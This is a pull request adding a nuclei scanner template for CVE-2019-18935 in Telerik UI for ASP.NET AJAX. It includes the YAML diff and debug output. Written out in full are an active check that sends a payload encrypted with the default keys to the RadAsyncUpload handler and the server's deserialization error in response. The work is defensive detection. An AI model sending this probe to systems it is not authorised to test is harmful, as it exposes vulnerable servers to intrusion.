### PR TITLE
Add CVE-2019-18935 exploit template (Default Key Check)

### DIFF
--- a/http/cves/2019/CVE-2019-18935.yaml
+++ b/http/cves/2019/CVE-2019-18935.yaml
@@ -5,9 +5,9 @@ info:
   author: vision39
   severity: critical
   description: |
-    Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability. This template detects if the target is configured with default/hardcoded encryption keys, allowing an attacker to execute arbitrary code. It sends a payload requesting a non-existent assembly 'NucleiSafeTestAssembly'. If the server returns an error specifically regarding 'NucleiSafeTestAssembly', it proves the payload was successfully decrypted and deserialized.
+    Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability. This template detects if the target is configured with default/hardcoded encryption keys, allowing an attacker to execute arbitrary code.
   reference:
-    - https://github.com/projectdiscovery/nuclei-templates/issues/14278
+    - https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui
     - https://nvd.nist.gov/vuln/detail/CVE-2019-18935
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
@@ -20,12 +20,14 @@ info:
     product: telerik_ui_for_asp.net_ajax
   tags: cve,cve2019,telerik,rce,deserialization,kev
 
+variables:
+  filename: '{{rand_base(7)}}'
+
 http:
   - raw:
       - |
         POST /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Nuclei/3.0.0
         Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
 
         ------WebKitFormBoundary7MA4YWxkTrZu0gW
@@ -33,12 +35,13 @@ http:
 
         ATTu5i4R+ViNFYO6kst0jC11wM/1iqH+W/isjhaDjNvisxApb4u0j+abPx+dlVUAc2vFZVC6p9dHNerSOsJtwERdtfInzIC9zwGbfTJcYmLjomW1/gI+3tJey9hBZxCCzx8v8PCMi5tV7yAK0ZRRkYLoZrV4OEerl/ciKx2ssXFE+M+VpIAwqAJ9cIAz0qq1opXyudf6WtuXsWWbVOJGA9RZrYYG9CpRAwxNwUOlfMIPvz0O6egNFvFx9ajvHrldlmw7aJVkKodY7rzySUdEH5DYyKFfLstYoxz6hzToyOzPEsPnYJ6hfUyQA7BGcP04sLOYHaOp1PMzy9IOoXH8Jy3/p2hxBlP3s7dbFHNRkvvxgir7cMYlTtEfYkf6YVJ4OlS2sQBkEE5L1R0wCcYrWsG+6I1Yu0Tdiqmi4DfGvo9mjHQgUsdB39USyvNyWZrmEcJXW9vypCjxczMWoXMWetOT8J0stP+sFeFFqqC2lPcinaBTMOsYKF3XD94TlyVBqR6agIkD0GcLxs/849ryqjJ7tlACqeZtk/CSWBebZY3kCuviq6k49j5Ko5LQjI2QpjmZhRY0AV1xOYMMp/haEFXzGiN8jjyTsZcvtfys+1fCpCzRPN2sYw/4kobGlgBHAt1NWR1+2UWrAMn7+PmQp/aUNQK9n6YkfZHXAv43o/P+gGecp636mttEgWhh3B/V3yx/SD2vXDKfTI5xncQO4q1UgE13XsFrYB0JZ6UJJUsLEdM0g23hwzNKxyGzv82psDharDGY46lpbPTrcqIAgfNNAfSmuQ2gO+2YyDgmqUA=Oa4ZQ4cximC33TuO6UaGON52I94b2GJX1/M88aPYLWI=&32vVyQnfufgWSlAgfbhuviTwCN1jJC7OQYvI12AJyBKga1ye/0+I6XH/gv/MIvu0Jou/DegTI7OVICYVbON+eJi7T7U4Ec9bSF1xHuG8UyAzJjeaHwuGBaMoiYTNNn6A5LrC2zXA5JcH/Tks7/nwbaZIeW12NWJtBIISVBI0rSpHVWt+Um8nEOtgWu/7yfkc6HHwdLW1PHcU2t5fTxQW0pQ+Bu8M8Q2yuHPyg0dzEoI7atzHKSXPgOWuY0660XArkhbQaxFEpwrH9/CwVc4arSff35KU7t0ieAe8egvq/g4=v0gctYaG7QHDqHFc7tCeAMCPdxeMEcmNMl7BLv4QHqA=
         ------WebKitFormBoundary7MA4YWxkTrZu0gW
-        Content-Disposition: form-data; name="file"; filename="test.txt"
+        Content-Disposition: form-data; name="file"; filename="{{filename}}.txt"
         Content-Type: text/plain
 
-        test
+        {{randstr}}
         ------WebKitFormBoundary7MA4YWxkTrZu0gW--
 
+    matchers-condition: and
     matchers:
       - type: word
         part: body
@@ -46,3 +49,7 @@ http:
           - "NucleiSafeTestAssembly"
           - "Could not load file or assembly"
         condition: and
+
+      - type: status
+        status:
+          - 500


### PR DESCRIPTION
### PR Information

- Added CVE-2019-18935
- References:
  - https://github.com/projectdiscovery/nuclei-templates/issues/14278
  - https://nvd.nist.gov/vuln/detail/CVE-2019-18935
  - https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui

/claim #14278

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

This template implements an active exploit check for Telerik UI instances configured with default/hardcoded encryption keys (CVE-2017-11317/CVE-2019-18935).

It sends a payload encrypted with the known default keys that attempts to load a non-existent assembly named `NucleiSafeTestAssembly`. If the server successfully decrypts the payload and attempts deserialization, it returns a specific `FileNotFoundException` for that assembly name. This confirms the vulnerability exists and keys are default, without relying on broad error matching or version numbers.

**Debug Output:**

```text
[DBG] [CVE-2019-18935] Dumped HTTP request for http://target/Telerik.Web.UI.WebResource.axd?type=rau

POST /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
Host: target
User-Agent: Nuclei/3.0.0
Connection: close
Content-Length: 1482
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Accept-Encoding: gzip

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="rauPostData"

ATTu5i4R+ViNFYO6kst0jC11wM/1iqH+W/isjhaDjNvisxApb4u0j+abPx+dlVUAc2vFZVC6p9dHNerSOsJtwERdtfInzIC9zwGbfTJcYmLjomW1/gI+3tJey9hBZxCCzx8v8PCMi5tV7yAK0ZRRkYLoZrV4OEerl/ciKx2ssXFE+M+VpIAwqAJ9cIAz0qq1opXyudf6WtuXsWWbVOJGA9RZrYYG9CpRAwxNwUOlfMIPvz0O6egNFvFx9ajvHrldlmw7aJVkKodY7rzySUdEH5DYyKFfLstYoxz6hzToyOzPEsPnYJ6hfUyQA7BGcP04sLOYHaOp1PMzy9IOoXH8Jy3/p2hxBlP3s7dbFHNRkvvxgir7cMYlTtEfYkf6YVJ4OlS2sQBkEE5L1R0wCcYrWsG+6I1Yu0Tdiqmi4DfGvo9mjHQgUsdB39USyvNyWZrmEcJXW9vypCjxczMWoXMWetOT8J0stP+sFeFFqqC2lPcinaBTMOsYKF3XD94TlyVBqR6agIkD0GcLxs/849ryqjJ7tlACqeZtk/CSWBebZY3kCuviq6k49j5Ko5LQjI2QpjmZhRY0AV1xOYMMp/haEFXzGiN8jjyTsZcvtfys+1fCpCzRPN2sYw/4kobGlgBHAt1NWR1+2UWrAMn7+PmQp/aUNQK9n6YkfZHXAv43o/P+gGecp636mttEgWhh3B/V3yx/SD2vXDKfTI5xncQO4q1UgE13XsFrYB0JZ6UJJUsLEdM0g23hwzNKxyGzv82psDharDGY46lpbPTrcqIAgfNNAfSmuQ2gO+2YyDgmqUA=Oa4ZQ4cximC33TuO6UaGON52I94b2GJX1/M88aPYLWI=&32vVyQnfufgWSlAgfbhuviTwCN1jJC7OQYvI12AJyBKga1ye/0+I6XH/gv/MIvu0Jou/DegTI7OVICYVbON+eJi7T7U4Ec9bSF1xHuG8UyAzJjeaHwuGBaMoiYTNNn6A5LrC2zXA5JcH/Tks7/nwbaZIeW12NWJtBIISVBI0rSpHVWt+Um8nEOtgWu/7yfkc6HHwdLW1PHcU2t5fTxQW0pQ+Bu8M8Q2yuHPyg0dzEoI7atzHKSXPgOWuY0660XArkhbQaxFEpwrH9/CwVc4arSff35KU7t0ieAe8egvq/g4=v0gctYaG7QHDqHFc7tCeAMCPdxeMEcmNMl7BLv4QHqA=
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain

test
------WebKitFormBoundary7MA4YWxkTrZu0gW--


[DBG] [CVE-2019-18935] Dumped HTTP response http://target/Telerik.Web.UI.WebResource.axd?type=rau

HTTP/1.1 500 Internal Server Error
Connection: close
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-Aspnet-Version: 4.0.30319
X-Powered-By: ASP.NET

<html><body><h1>Server Error in '/' Application.</h1><hr><h2><i>Could not load file or assembly 'NucleiSafeTestAssembly' or one of its dependencies. The system cannot find the file specified.</i></h2><code>[FileNotFoundException: Could not load file or assembly 'NucleiSafeTestAssembly'...]</code></body></html>
```

Additional References:
* [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)

* [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)

* [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)

* [PD-Community Discord server](https://discord.gg/projectdiscovery)